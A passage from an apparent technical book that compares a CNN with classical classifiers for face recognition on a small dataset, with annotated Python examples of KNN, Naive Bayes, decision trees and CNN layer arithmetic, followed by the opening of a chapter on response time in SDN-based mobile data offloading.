• Jaccard distance


Subsequently, a certain number of examples (K) closest to the query are
picked. Selecting an appropriate value of K is a crucial part of its
implementation; it is recommended to choose a value of K that’s neither
too large nor too small. For instance, if someone takes K=1, the model
will be too specific to the data instead of being generalized and will
tend to be sensitive towards noise. The model may accomplish high
accuracy on training data but will give unsatisfactory predictions on
previously unseen data. On the other hand, if someone takes K=100, the
model will become too generalized and will result in inaccurate
predictions on both train and test data. For choosing the right K, a
trial and error method is generally used, i.e., trying several values of
K and using the one that works best. Then the label of the query is
selected by the majority voting principle (in case of classification) or
by averaging the labels (in case of regression) [8].

KNN’s main drawback is that it becomes notably slow as the volume of data
or the number of independent variables increases, and it has no ability
to handle missing features of data, making it unsuitable to use in a
practical environment (use cases) where classifications/predictions need
to be made rapidly and accurately. However, KNN shows supremacy when it
comes to:


• Implementation
• Small dataset
• Constantly evolving dataset
• Where training is not required
• Just one hyper-parameter given


It is also known as a lazy learning algorithm, as at the time of training
all it does is save the complete data in memory; it does not perform any
computations on that data until scoring, i.e., when someone applies the
model on previously unseen points. So for training purposes runtime is as
good as it gets, and runtime of scoring can be exhaustive, varying
linearly with the number of data points. Memory usage of KNN also grows
linearly with the number of data points provided for training. The
performance of this algorithm can be used as a threshold to define the
accuracy that is acceptable, even in the worst case.
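
The effect of K described in this section can be reproduced on a handful
of points. The following is an added example, not code from the chapter:
a from-scratch KNN classifier with Euclidean distance and majority voting,
run on a constructed data set in which one sample is deliberately
mislabelled. The names TRAIN, knn_predict, leave_one_out_accuracy and
best_k, and the tie rule for even K, are this example's own choices.

```python
from collections import Counter
from math import dist  # Euclidean distance between two points

# Constructed training set: class "A" clusters near (0, 0), class "B" near
# (5, 5). The point (0.3, 0.3) is a noisy sample: it lies inside A's cluster
# but carries the label "B".
TRAIN = [
    ((0.0, 0.0), "A"), ((0.5, 0.0), "A"), ((0.0, 0.5), "A"), ((0.6, 0.6), "A"),
    ((0.3, 0.3), "B"),
    ((5.0, 5.0), "B"), ((5.5, 5.0), "B"), ((5.0, 5.5), "B"),
    ((5.5, 5.5), "B"), ((6.0, 6.0), "B"),
]


def knn_predict(train, query, k):
    """Label `query` by majority vote among its k nearest training points."""
    if not 1 <= k <= len(train):
        raise ValueError("k must be between 1 and the number of training points")
    neighbours = sorted(train, key=lambda item: dist(item[0], query))[:k]
    votes = Counter(label for _, label in neighbours)
    top = max(votes.values())
    # Tie rule (this example's choice): with an even k the vote can be split,
    # in which case the label of the nearest tied neighbour wins.
    for _, label in neighbours:
        if votes[label] == top:
            return label


def leave_one_out_accuracy(data, k):
    """Score k by predicting every point from all the other points."""
    correct = 0
    for i, (point, label) in enumerate(data):
        rest = data[:i] + data[i + 1:]
        correct += knn_predict(rest, point, k) == label
    return correct / len(data)


def best_k(data, candidates):
    """Trial and error over candidate values of K; first best value wins."""
    return max(candidates, key=lambda k: leave_one_out_accuracy(data, k))


if __name__ == "__main__":
    query = (0.2, 0.3)  # sits in A's cluster, right next to the noisy sample
    for k in (1, 2, 3, 10):
        print(f"K={k:<2d} -> {knn_predict(TRAIN, query, k)}")
    for k in (1, 3, 9):
        print(f"K={k}: leave-one-out accuracy {leave_one_out_accuracy(TRAIN, k):.1f}")
    print("chosen K:", best_k(TRAIN, (1, 3, 9)))
```

With K=1 the query follows the single noisy neighbour, with K=3 the vote
corrects it, and with K equal to the whole data set every query receives
the majority class.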


11.3.4 Support Vector Machine (SVM) 


Support Vector Machine sounds intimidating but is based on a sim- 
ple idea of creating a line/hyperplane (n-dimensional subspace for an 
n-dimensional space) to separate the data into classes and maximizing 
the margin. Margin is the smallest (perpendicular) distance between data 
point and hyperplane. It is a supervised machine learning algorithm which 
is used to solve both classification and regression problems. At first approx- 
imation a basic hyperplane is created and with addition of new points it 
moves maximizing the margin. From [2], the study supports the hypothe- 
sis from this paper that the SVM approach is able to extract all the relevant 
information from the training data. Support Vectors are the data points 
closest to the hyperplane, and if removed would result in altered position 
of the hyperplane and may result in low accuracy. Core elements contrib- 
uting to SVM accuracy are: 


• Choice of kernel (mathematical function to manipulate data)
• Proper tuning of hyper-parameters


Choosing a kernel to utilize current features to apply some
transformations, creating new features (transforming a low-dimension
input space to a high-dimension one), is known as a kernel trick. Radial
Basis and Polynomial Function are the most popular ones used. Now in
real-world scenarios finding a linearly separable dataset is nearly
impossible. So there is some tolerance given to SVM, called soft margin,
to handle misclassifications, as the bigger the tolerance is, the
narrower the margin. A combination of soft margin and kernel tricks is
used to deal with real-life scenarios like text classification, such as
spam detection and category assignment, etc.


11.3.5 Logistic Regression (LR) 


Logistic Regression is an elemental and popular algorithm used to solve 
classification problems. It is a supervised machine learning algorithm; it 
is named as Regression because its fundamental technique is similar to 
Linear Regression. Linear Regression assumes a linear relation between 
input independent variables and output dependent variables, and is 
highly sensitive to outliers in data resulting in poor outcomes/predictions. 
Logistic Regression uses a logistic function (sigmoid function, which 
gives output value between 0 and 1) to overcome this drawback. In logis- 
tic regression a probability threshold is determined; if the probability of 
an element is above the threshold then it is classified in one class or vice 
versa. 

There are three different categories of Logistic Regression:


• Binary: Only two possible outcomes
• Multinomial: three or more categories without ordering
• Ordinal: three or more categories with ordering


For determining binary classification, one tries to find the best fitted
line first by Linear Regression; then the predicted value is fed into the
sigmoid function for conversion to probability. Maximum likelihood
estimation is used for calculation of the cost function instead of mean
squared error, since using mean squared error would result in a
non-convex function of the parameters with many local minima, making it
laborious to find the global minimum and minimize the cost value. By
default this algorithm is limited to binary-class classification, but a
popular workaround can be used for multi-class classification, i.e.,
splitting the problem into multiple binary classification problems. An
alternate approach involves changing the loss function to cross entropy
loss and the single output probability to one probability per class. One
major drawback is that it is difficult to capture complex relationships,
as linearly dependent data is rarely found in real-world scenarios, and
it can only be used to predict discrete sets. However, it is easy to
implement, and is efficient, accurate and fast at classifying previously
unknown data.


11.3.6 Naive Bayes (NB)


Naive Bayes is a user-oriented, powerful supervised machine learning
algorithm which uses a series of probabilistic classifiers based on Bayes
rule with simple assumptions:


• There is no correlation between features or predictors; i.e., they’re
independent of each other.

• The features contribute equally, i.e., all carry the same weightage in
classification; no feature is given more importance than others.


Naive Bayes is a generative model (a model which creates new data
instances). It is generally used for General Classification and text
analytics. It has many configurations, namely:


• Multinomial Naive Bayes - Computes likelihood to be count of a random
variable.

• Complement Naive Bayes - Instead of computing the probability of a
random variable belonging to a particular class, it computes the
probability of a random variable belonging to all classes.

• Bernoulli Naive Bayes - Predictors/features are Boolean (binary)
variables; the rest is similar to multinomial Naive Bayes.

• Out-of-core Naive Bayes - This classifier handles large-scale
classification for which the complete dataset might not fit.

• Gaussian Naive Bayes - This involves predictors (input data mapped to
target variable) taking a continuous value like in a Gaussian/Normal
Distribution.


Firstly, one calculates the probability of each class out of all classes,
which is known as its class prior probability; similarly, the probability
of each predictor out of all predictors, which is known as the predictor
prior probability, is computed. In the third step one calculates the
likelihood, i.e., the probability of the predictor given the class. Then
in the final step the posterior probability, i.e., the probability of the
class given the predictor, is calculated. Now if a model has many
features then it is possible that the resulting probability may become
zero because one of the attribute’s values is zero [9]. To solve this
problem, someone can increase the value of the feature with zero to a
small value so that the required probability doesn't come out as zero.
This correction is known as Laplace correction. Gaussian Naive Bayes
shows dominance when it comes to predicting using a small dataset. It
performs effectively on categorical input variables as compared to
numerical variables. On the contrary, Bayes is considered a bad estimator
sometimes, but despite the strong assumptions and cons, this performs
extremely well in many cases and is a computationally inexpensive
classifier.
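
The four steps and the zero-probability problem described above, worked
through on text messages. This is an added example, not code from the
chapter: a small multinomial Naive Bayes over constructed messages, using
exact fractions so the effect of the correction is visible. It uses the
usual add-alpha form of the Laplace correction, which adds alpha to every
count rather than only to the zero one; TRAIN, fit, posterior and classify
are this example's own names.

```python
from collections import Counter
from fractions import Fraction

# Constructed training messages (label, text); not data from the chapter.
TRAIN = [
    ("spam", "win cash now"),
    ("spam", "win prize now"),
    ("ham", "meeting at noon"),
    ("ham", "lunch at noon"),
    ("ham", "project meeting now"),
]


def fit(train):
    """Count documents per class and word occurrences per class."""
    docs, words = Counter(), {}
    for label, text in train:
        docs[label] += 1
        words.setdefault(label, Counter()).update(text.split())
    vocab = set().union(*words.values())
    return docs, words, vocab


def posterior(model, text, alpha=1):
    """Return {class: P(class | words)}, or None if every class scores zero.

    alpha is the Laplace correction (an int or Fraction); alpha=0 disables it.
    """
    docs, words, vocab = model
    total_docs = sum(docs.values())
    # Words never seen in training carry no information and are skipped.
    tokens = [t for t in text.split() if t in vocab]
    joint = {}
    for label in docs:
        score = Fraction(docs[label], total_docs)            # class prior
        denom = sum(words[label].values()) + alpha * len(vocab)
        for token in tokens:
            # Likelihood P(word | class); zero without the correction when
            # the word never occurred in this class.
            score *= Fraction(words[label][token] + alpha, denom)
        joint[label] = score
    evidence = sum(joint.values())                           # P(words)
    if evidence == 0:
        return None                                          # nothing to normalise
    return {label: score / evidence for label, score in joint.items()}


def classify(model, text, alpha=1):
    """Pick the class with the highest posterior, or None if undefined."""
    post = posterior(model, text, alpha)
    return None if post is None else max(post, key=post.get)


if __name__ == "__main__":
    model = fit(TRAIN)
    message = "win cash meeting"   # "meeting" never occurs in spam, "win" never in ham
    print("alpha=0:", posterior(model, message, alpha=0))
    print("alpha=1:", posterior(model, message, alpha=1))
    print("label  :", classify(model, message))
```

Without the correction a single unseen word wipes out every class and no
decision is possible; with alpha=1 the same message is assigned to "spam"
with posterior 288/413.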


11.3.7 Decision Tree (DT)


Decision trees are non-parametric supervised machine learning algorithms
which are used for both regression and classification. Decision trees
learn directly from the dataset with the help of if-else decision rules
in order to estimate a sine curve. They consist of two elements: branches
and nodes. Some chief terminologies associated with decision trees are:


• Root Node: This node marks the start of the decision tree.

• Decision Node: Where a sub-node splits into further nodes.

• Terminal/Leaf Node: Last node of the tree, i.e., predicted/classified
label.

• Sub-Tree/Branch: Subdivision of the entire tree.


A decision tree classifies an example by sorting it down the tree to some
terminal/leaf node, which provides the classified label. Each and every
node represents a test case for some feature, and each edge down from the
node gives a potential answer. Its accuracy is greatly determined by its
ability to make tactical splits. A decision tree uses numerous algorithms
to decide that split, such as:


• ID3: Iterative Dichotomiser 3 (Extension of D3)
• C4.5: Successor of ID3
• CART: Classification and Regression Tree
• CHAID: Chi-square Automatic Interaction Detection
• MARS: Multivariate Adaptive Regression Splines


First of all, the root node attribute is chosen based on an Attribute
Selection Measure (ASM), i.e., if a dataset has N attributes, determining
which attribute should be placed at the root/internal nodes. It’s not
feasible to just select randomly, as it may give poor results with low
accuracy. So certain metrics are used, such as Entropy or Gini Index for
categorical and Mean Squared or Residual Error for regression, and
different processes, depending on whether the evaluating feature is
continuous or discrete. For a continuous attribute, the average of two
consecutive values is used as a possible threshold; for a discrete
attribute, all possible values are evaluated, leading to N calculated
metrics for each variable, resulting in N possible values for each
categorical value. This process is repeated until a stopping criterion is
reached. Now this splitting leads to complex grown trees which are more
likely to overfit the data, resulting in low accuracy on previously
unseen data. A process called pruning is used to ensure good accuracy and
prevent overfitting. It reduces the size of trees by turning some
branches into leaf nodes, and discarding the leaf nodes under the primary
branch, making the tree simpler in structure. A pruned tree has less
sparsity than an unpruned tree. After a decision tree is built,
predicting a value/label starts from the root of the tree, comparing the
root feature with the record’s feature, and then following the branch
corresponding to that value until the terminal/leaf node with the
predicted value is attained. When compared to other algorithms, this
doesn’t require large datasets, normalization or scaling of data, and
missing values do not affect the building of a decision tree; then again,
a small change in data may cause a great change in the structure of the
tree, causing instability. As the complexity of decision rules is
directly proportional to the depth of the tree, decision trees need a
good amount of time to train the model, as sometimes calculations go far
more complex than in other algorithms.
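
The attribute selection step above, carried through on a small data set.
This is an added example, not code from the chapter: it scores candidate
tests with the Gini index, using midpoints of consecutive values as
thresholds for a continuous attribute and every value for a discrete one,
then grows the tree and predicts by walking it. The rows are constructed,
all function names are this example's own, and max_depth is a simple depth
limit standing in for the pruning the text describes.

```python
from collections import Counter
from fractions import Fraction
from numbers import Number

# Constructed rows: ((continuous attribute, discrete attribute), label).
ROWS = [
    ((2, "red"), "A"), ((3, "blue"), "A"), ((4, "blue"), "A"),
    ((7, "red"), "B"), ((8, "blue"), "B"), ((9, "red"), "A"),
]


def gini(labels):
    """Gini index of a list of labels: 0 for a pure node."""
    n = len(labels)
    return 1 - sum(Fraction(c, n) ** 2 for c in Counter(labels).values())


def candidate_tests(rows, feature):
    """Thresholds to try for one attribute."""
    values = sorted({x[feature] for x, _ in rows})
    if all(isinstance(v, Number) for v in values):
        # Continuous: the average of each pair of consecutive values.
        return [("<=", (a + b) / 2) for a, b in zip(values, values[1:])]
    # Discrete: every value that occurs.
    return [("==", v) for v in values]


def passes(x, feature, op, value):
    return x[feature] <= value if op == "<=" else x[feature] == value


def best_split(rows):
    """Return (weighted Gini, feature, op, value) of the best test, or None."""
    best = None
    for feature in range(len(rows[0][0])):
        for op, value in candidate_tests(rows, feature):
            left = [y for x, y in rows if passes(x, feature, op, value)]
            right = [y for x, y in rows if not passes(x, feature, op, value)]
            if not left or not right:
                continue  # the test separates nothing
            score = (Fraction(len(left), len(rows)) * gini(left)
                     + Fraction(len(right), len(rows)) * gini(right))
            if best is None or score < best[0]:
                best = (score, feature, op, value)
    return best


def build(rows, max_depth=None, depth=0):
    """Grow a tree: a leaf is a label, a node is (feature, op, value, yes, no)."""
    labels = [y for _, y in rows]
    majority = Counter(labels).most_common(1)[0][0]
    if gini(labels) == 0 or (max_depth is not None and depth >= max_depth):
        return majority
    split = best_split(rows)
    if split is None:
        return majority
    _, feature, op, value = split
    yes = [(x, y) for x, y in rows if passes(x, feature, op, value)]
    no = [(x, y) for x, y in rows if not passes(x, feature, op, value)]
    return (feature, op, value,
            build(yes, max_depth, depth + 1), build(no, max_depth, depth + 1))


def predict(tree, x):
    """Walk from the root to a leaf, following the branch each test selects."""
    while isinstance(tree, tuple):
        feature, op, value, yes, no = tree
        tree = yes if passes(x, feature, op, value) else no
    return tree


if __name__ == "__main__":
    print("root test :", best_split(ROWS))
    print("full tree :", build(ROWS))
    print("depth <= 1:", build(ROWS, max_depth=1))
    print("predict   :", predict(build(ROWS), (7.9, "red")))
```

The continuous attribute wins the root (weighted Gini 2/9 at threshold 5.5
against 4/9 for the discrete one). The fully grown tree fits the single
"A" at value 9, while the depth-limited tree labels that region "B".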


11.4 Experimental Methodology 


11.4.1 Dataset 


For this experiment a custom dataset was made and used. The dataset con- 
sisted of six folders representing six different people having 45 images of 
each individual. Images in these folders are of different sizes and are hand- 
picked such that only the front view of the face is taken. All the images are 
in RGB format. 


11.4.2 Convolutional Neural Network (CNN) 


• Preprocessing

As the dataset is small and collected images are of different sizes, it is not
suitable for direct input in a neural network. Therefore, they are
preprocessed according to needs.

The following steps are taken for preprocessing:


1. All the images are first loaded and each image is reshaped 
into dimensions of 64*64. 

2. After this, integer labels starting from 0 to 5 are given to 
string labels of images. And data of each folder is shuffled 
and divided into training and testing dataset randomly in a 
ratio of 7:3. 

3. Then the new dataset is augmented using the 
ImageDataGenerator class of Keras. Data is augmented in 
order to improve the model's performance and increase its 
accuracy by increasing the ability to generalize. It artifi- 
cially creates new instances of data from an existing dataset 
by using transforms such as zoom, flip, shift, etc. By aug- 
menting the dataset, it introduces variations of images to the 
model. The following parameters were given: 

   • class_mode = categorical, i.e., 2D array of one-hot encoded labels
   • batch_size = 2
   • target_size = (64,64)
   • zoom_range = 0.2, i.e., random zoom range
   • horizontal_flip = True

4. Lastly, the preprocessed dataset is fed to the neural network.


• Convolutional Neural Network for Image Processing

1. To make this architecture, the sequential model API of the 
Keras library is used. 

2. Three convolutional 2D layers are made with 64, 128 and 64 filters,
respectively. After preprocessing, the input size of each image is
[64, 64, 3] dimensionally. The first Conv2D layer comprises 64 filters
with [5,5] as the dimensions of each filter and uses ReLU as activation
function. This layer gives output of dimensions [60, 60, 64]. (Because 64
filters are used, the third dimension changes to 64, i.e., it adds 64
channels to the image.) After this a MaxPool2D layer of dimension [2,2]
is added to provide an abstract form (avoiding overfitting) and reduce
the dimensions of the output of the first layer. The resultant dimensions
are [30,30,64]. This is passed as input to the third layer, which is
again a Conv2D layer of 128 filters having [5,5] as dimensions, again
using ReLU as activation function. This layer gives output of
[26,26,128] dimensions. Now again a MaxPool layer of dimensions [2,2] is
added, giving output with dimensions [13,13,128]. This is used as input
for the last Conv2D layer, having 64 filters of [5,5] dimensions and
activation function ReLU, giving [9,9,64] as output dimensions. Another
MaxPool2D layer of [2,2] dimensions is added. This layer gives output of
[4,4,64] dimensions. The neural network architecture and summary can be
seen in Figures 11.1 and 11.2 respectively below.

from keras.models import Sequential
from keras.layers import Convolution2D, MaxPool2D, Flatten, Dense

model = Sequential()

model.add(Convolution2D(64, kernel_size=(5, 5), strides=(1, 1), input_shape=(64,64,3), activation='relu'))
model.add(MaxPool2D(pool_size=(2,2)))

model.add(Convolution2D(128, kernel_size=(5, 5), strides=(1, 1), activation='relu'))
model.add(MaxPool2D(pool_size=(2,2)))

model.add(Convolution2D(64, kernel_size=(5, 5), strides=(1, 1), activation='relu'))
model.add(MaxPool2D(pool_size=(2,2)))

model.add(Flatten())

model.add(Dense(256, activation='relu'))

model.add(Dense(128, activation='relu'))

model.add(Dense(6, activation='softmax'))


Figure 11.1 Architecture of convolutional neural network.


Model: "sequential_1"
_________________________________________________________________
Layer (type)                 Output Shape              Param #
=================================================================
conv2d_3 (Conv2D)            (None, 60, 60, 64)        4864
max_pooling2d_3 (MaxPooling2 (None, 30, 30, 64)        0
conv2d_4 (Conv2D)            (None, 26, 26, 128)       204928
max_pooling2d_4 (MaxPooling2 (None, 13, 13, 128)       0
conv2d_5 (Conv2D)            (None, 9, 9, 64)          204864
max_pooling2d_5 (MaxPooling2 (None, 4, 4, 64)          0
flatten_1 (Flatten)          (None, 1024)              0
dense_3 (Dense)              (None, 256)               262400
dense_4 (Dense)              (None, 128)               32896
dense_5 (Dense)              (None, 6)                 774
=================================================================
Total params: 710,726
Trainable params: 710,726
Non-trainable params: 0


Figure 11.2 Summary of convolutional neural network.


model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=["accuracy"])


Figure 11.3 Compilation of convolutional neural network.


3. Now a Flatten layer is added to flatten the output and pass it to the
Dense layers for prediction. After flattening, the output dimension is
1024. Towards the end of the network there are 2 dense hidden layers of
256 and 128 neurons, and lastly a 6 neuron softmax layer to calculate
probabilities.

4. The model is compiled using accuracy as metrics, Adam 
optimizer and categorical cross entropy because of multi- 
class classification. The model can be compiled using the 
program shown in Figure 11.3. 

5. For predictions: the saved model in “h5” format is loaded and the
“predict” function is called, taking new images as input arguments and
making predictions based on them. It gives output as “0” for the first
individual, “1” for the second individual and so on up to 6 individuals.
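
The layer dimensions quoted in step 2, the parameter counts of Figure
11.2, and the stride, padding and pooling rules of Section 11.3.2 can all
be checked without Keras. The following is an added example, not code from
the chapter; the helper names are this example's own, and it assumes square
kernels, convolution without padding unless stated, and a pooling stride
equal to the window size (the Keras defaults used by Figure 11.1).

```python
def conv2d(shape, filters, kernel, stride=1, padding=0):
    """Return (output_shape, params) for a square-kernel 2D convolution."""
    h, w, depth = shape
    if kernel > h + 2 * padding or kernel > w + 2 * padding:
        raise ValueError("kernel does not fit inside the padded input")
    out_h = (h + 2 * padding - kernel) // stride + 1
    out_w = (w + 2 * padding - kernel) // stride + 1
    # Each filter holds kernel*kernel*depth weights plus one bias.
    params = (kernel * kernel * depth + 1) * filters
    return (out_h, out_w, filters), params


def pool2d(shape, window=2, stride=None):
    """Pooling changes height and width only and has no parameters."""
    stride = stride or window
    h, w, depth = shape
    if window > h or window > w:
        raise ValueError("pooling window is larger than the feature map")
    return ((h - window) // stride + 1, (w - window) // stride + 1, depth), 0


def flatten(shape):
    """Collapse a feature map into one vector."""
    size = 1
    for dim in shape:
        size *= dim
    return (size,), 0


def dense(shape, units):
    """Fully connected layer: one weight per input per unit, plus a bias."""
    (inputs,) = shape
    return (units,), (inputs + 1) * units


LAYER_FUNCS = {"conv2d": conv2d, "pool2d": pool2d, "flatten": flatten, "dense": dense}

# The layer stack of Figure 11.1, in order.
FIGURE_11_1 = [
    ("conv2d", {"filters": 64, "kernel": 5}),
    ("pool2d", {}),
    ("conv2d", {"filters": 128, "kernel": 5}),
    ("pool2d", {}),
    ("conv2d", {"filters": 64, "kernel": 5}),
    ("pool2d", {}),
    ("flatten", {}),
    ("dense", {"units": 256}),
    ("dense", {"units": 128}),
    ("dense", {"units": 6}),
]


def summarize(input_shape, layers):
    """Walk the stack and return [(layer, output_shape, params), ...]."""
    rows, shape = [], input_shape
    for name, kwargs in layers:
        shape, params = LAYER_FUNCS[name](shape, **kwargs)
        rows.append((name, shape, params))
    return rows


def total_params(rows):
    return sum(params for _, _, params in rows)


if __name__ == "__main__":
    rows = summarize((64, 64, 3), FIGURE_11_1)
    for name, shape, params in rows:
        print(f"{name:8s} {str(shape):16s} {params:>8d}")
    print("total params:", total_params(rows))
    # Stride and padding, as discussed in Section 11.3.2:
    print("5x5, stride 2      :", conv2d((64, 64, 3), 64, 5, stride=2)[0])
    print("3x3, padding 1     :", conv2d((64, 64, 3), 8, 3, padding=1)[0])
```

A larger stride shrinks the feature map (60x60 becomes 30x30 for the first
layer), while a 3x3 kernel with padding 1 keeps the 64x64 input size.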


11.4.3 Other Machine Learning Techniques 


• Preprocessing

The collected images (dataset) are not suitable to be given directly to any
machine learning technique; hence some preprocessing is required.

For preprocessing the following steps are taken: 


1. All the images are first loaded using the OpenCV module 
but it loads images in BGR color channel rather than RGB 
which is required. So in order to obtain an RGB channel, 
order is reversed. 

2. Next, every image in the dataset is aligned to a particular dimension
so that each image is of the exact same dimension from all sides. In this
step, other parameters of the alignment module such as
‘getLargestFaceBoundingBox()’ and ‘landmarkIndices’ are also used.

3. Now the image is embedded into a vector of zeros; in this step the
image is converted from RGB (values up to 255) to the interval [0,1], so
that each pixel of the resultant vectorized image has a value between 0
and 1.

4. Now it is necessary to encode the labels for each image. In order to
do that a LABEL ENCODER is initialized, which is fitted with the labels
from the dataset. Finally, the encoder transforms the labels into a
numerical value matrix so that they can be used with the vectorized form
of the images.

5. One final step is taken, to split the images as well as the labels
into training and testing data. It is important to shuffle data before
splitting.


• K-Nearest Neighbor (KNN)


1. First step is to import the “KNeighborsClassifier” from the neighbors
model API of the sklearn library.

2. This KNeighborsClassifier is used to classify images; it is primarily
based on the K nearest neighbors (KNN) machine learning technique.

3. The classifier has different types of hyperparameters, all of which
have default values, but values can be set according to requirement.

4. In this classifier two hyperparameters are changed:

1) n_neighbors = 2 (default: 5)
2) metric = ‘euclidean’ (default: ‘minkowski’)

5. KNN classifier can be initiated as shown in Figure 11.4. Now training
data is fitted into the classifier.

6. At last the “predict” function is used to classify the images, and
with the help of “accuracy score” the accuracy of the classifier is
generated.


• Support Vector Machine (SVM)


1. First step is to import the “LinearSVC” from the svm model API of the
sklearn library.

2. This LinearSVC classifier is used to classify images; it is primarily
based on the Support vector machine (SVM) machine learning technique.

3. The classifier has different types of hyperparameters, all of which
have default values, but values can be set according to requirement.


from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors=2, metric='euclidean')


Figure 11.4 Summary and Hyperparameters of K-Nearest Neighbor classifier.


from sklearn.svm import LinearSVC
Lsvc = LinearSVC(penalty='l2', loss='squared_hinge', max_iter=1000)


Figure 11.5 Summary and Hyperparameters of support vector machine classifier.


4. In this classifier three hyperparameters are changed:
1) penalty = ‘l2’
2) loss = ‘squared_hinge’
3) max_iter = 1000

5. SVM classifier can be initiated as shown in Figure 11.5. Now 
training data is fitted into the classifier. 

6. At last the “predict” function is used to classify the images 
and with the help of “accuracy score” the accuracy of the 
classifier is generated. 


• Naive Bayes (NB)


1. First step is to import the “GaussianNB” from the Naive Bayes model
API of the sklearn library.

2. This GaussianNB classifier is used to classify images; it is primarily
based on the Naive Bayes machine learning technique.

3. The classifier has different types of hyperparameters, all of which
have default values, but values can be set according to requirement.

4. In this classifier all default hyperparameters are used.

5. Gaussian Naive Bayes classifier can be initiated as shown in
Figure 11.6. Now training data is fitted into the classifier.

6. At last the “predict” function is used to classify the images 
and with the help of “accuracy score” the accuracy of the 
classifier is generated. 


• Logistic Regression (LR)


1. First step is to import the “LogisticRegression” from the linear
model API of the sklearn library.

2. This Logistic Regression classifier is used to classify images; it is
primarily based on the Logistic Regression machine learning technique.

3. The classifier has different types of hyperparameters, all of which
have default values, but values can be set according to requirement.

4. In this classifier one hyperparameter is changed:

1) multi_class = ‘multinomial’ (default: ‘auto’)


from sklearn.naive_bayes import GaussianNB
gnb = GaussianNB()


Figure 11.6 Summary and hyperparameters of Naive Bayes classifier.


from sklearn.linear_model import LogisticRegression
lr = LogisticRegression(multi_class='multinomial')


Figure 11.7 Summary and hyperparameters of Logistic Regression classifier.


from sklearn import tree
dt = tree.DecisionTreeClassifier(splitter='best', criterion='gini')


Figure 11.8 Summary and hyperparameters of Decision Tree classifier.


5. Logistic regression classifier can be initiated as shown in 
Figure 11.7. Now training data is fitted into the classifier. 

6. At last the “predict” function is used to classify the images, and
with the help of “accuracy score” the accuracy of the classifier is
generated.


• Decision Tree (DT)


1. First step is to import the “DecisionTreeClassifier” from the tree
model API of the sklearn library.

2. This DecisionTreeClassifier is used to classify images; it is
primarily based on the Decision Tree machine learning technique.

3. The classifier has different types of hyperparameters, all of which
have default values, but values can be set according to requirement.

4. In this classifier two hyperparameters are changed according to
requirement:

1) splitter = “best”
2) criterion = “gini”

5. Decision tree classifier can be initiated as shown in Figure 11.8.
Now training data is fitted into the classifier.

6. At last the “predict” function is used to classify the images, and
with the help of “accuracy score” the accuracy of the classifier is
generated.


11.5 Results 


All the classifiers and the Convolutional neural network were fitted on
the training dataset of images. Training of CNN took a few hours but was
able to make precise predictions on input images. It was observed that
for a small dataset CNN didn’t perform up to the mark; on the other hand,
traditional machine learning algorithms unexpectedly performed well on a
small dataset, with accuracy ranging from 92% to 97%. If the dataset is
skewed (increased number of images belonging to a particular class), it
was observed that traditional machine learning algorithms showed highly
biased results towards a particular class as compared to convolutional
neural networks. Traditional machine learning algorithms and
convolutional neural networks show poor results when the input face image
provided is not front facing, but this restriction will be lifted if the
convolutional neural network is trained on a few images facing other
sides. The graph shown below in Figure 11.9 shows the accuracy percentage
for each algorithm. The percentage is computed by comparing the number of
correctly identified images with the total number of tested images.

Figure 11.9 Accuracy comparison between convolutional neural network (CNN) and
other machine learning techniques.


11.6 Conclusion


Face recognition is one of the most challenging problems in the vast field
of computer vision. It has received a lot of attention over the last few
decades because of its applications in various sectors [11]. A vast amount
of research has been conducted over the past few decades, a lot of progress
has been made in this field, and the results have been encouraging for
researchers. But a perfect face recognition system that performs adequately
under all circumstances and conditions is still a long way off.


“The human face is a dynamic object and has a high degree of vari- 
ability in its appearance, which makes face detection a difficult 
problem in computer vision.” 


“Face detection: A survey” [10]. 


This paper presents an empirical comparison of different machine learning
and deep learning techniques for face recognition systems. The results are
all satisfactory and promising, and they clearly show that the CNN
(convolutional neural network) performed better than any of the other
machine learning techniques. But these are only a small set of the
available techniques; many others still need research and may perform even
better. This leaves scope for future work in which more promising
techniques are developed by improving and advancing the existing ones.
Every methodology needs more advanced research so that it can be deployed
in various sectors to meet public need. Security and surveillance are the
sectors most impacted by face recognition systems. Nowadays, there is talk
of implementing these face recognition systems in the banking sector (for
security, fraud detection, etc.), but there are still some areas where
these advanced technologies can be exploited by intruders, hackers, etc.,
so there is scope for a lot of further study, research, infrastructure
improvement, etc.


Abstract

Data traffic offloading methodologies are likely to improve the quality of
mobile service by addressing the issue of insufficient bandwidth caused by
the rapid growth of cellular data traffic. To measure the real-time
performance of Software-defined networking (SDN) based offloading systems,
it is essential to compute the response time. In this study, we develop a
computation model to estimate the response time of the SDN-based data
traffic offloading system (SDN-TOS) in order to predict the efficiency of
system performance accurately. The values related to the process of the
Mininet emulator were collected from a mobile communication company through
a third-party broker based in Sri Lanka. Further analysis compares the
proposed model with the Cloud Service Providers (CSP) approach. The CSP
approach considers only one network to estimate the response time; in
contrast, our model accounts for the response time of the SDN controller
and of both Long-Term Evolution (LTE) and Wi-Fi in the offloading process.
Hence, our computation model generates a highly accurate value for the
required response time of SDN-TOS. The essential parameters that directly
affect the offloading task, such as computation capability and uplink data
rate, are observed through a comparison between two different service
providers. The computation capability and uplink data rate of data traffic
offloading processes play a significant role in real-time decision making
for data and mobile communication services. Our analysis exhibits the
effectiveness of a comprehensive computation model and identifies the most
appropriate parameters to enhance the performance of SDN-TOS in the mobile
and data communication industries.


Keywords: Software-defined networking (SDN), data traffic offloading system, 
multipath transmission, Mininet Wi-Fi emulator, TOS, wireless communication, 
mobile networks, mobile data offloading 


12.1 Introduction 


Due to the rapid growth and enhancements of technology in the era of 
Industry 4.0, the fourth industrial revolution [1], organizations are imple- 
menting strategies for digital transformation to leverage the quality of 
their products and services. Not only organizations, but also individuals 
are embracing this digital transformation. This includes technologies such 
as artificial intelligence, fifth-generation wireless technologies, self-driving 
vehicles, Internet of Things (IoT), and robotics.

Especially, industries such as healthcare [2-6], manufacturing [7-10],
autonomous vehicles [11-14], and farming [15-18], are heavily investing 
to move towards automating their products and processes to improve qual- 
ity and efficiency. Research carried out on a fall detection system using a 
smartphone [19] shows how a Software-Defined Networks (SDN) based 
system can be used in healthcare. It also discusses the importance of per- 
formance in such a system. One of the studies on indoor farming [15] 
shows how farming can be improved with assisted robots and a real-time 
monitoring mobile application by reducing the cost and carbon dioxide 
emission. Another paper [16] discusses how Software-Defined Networks 
(SDN) and Network Function Virtualization (NFV) can help to lower the 
costs of smart farming. Automobile is another industry that transforms 
with 5G and edge devices [20-22], introducing features such as automated 
driving. Furthermore, an article on how the construction industry trans- 
forms with digitization [23] explains how real-time monitoring systems 
can help them to react quickly in high-risk environments to create a more 
secure worksite showing the importance of estimating the response time 
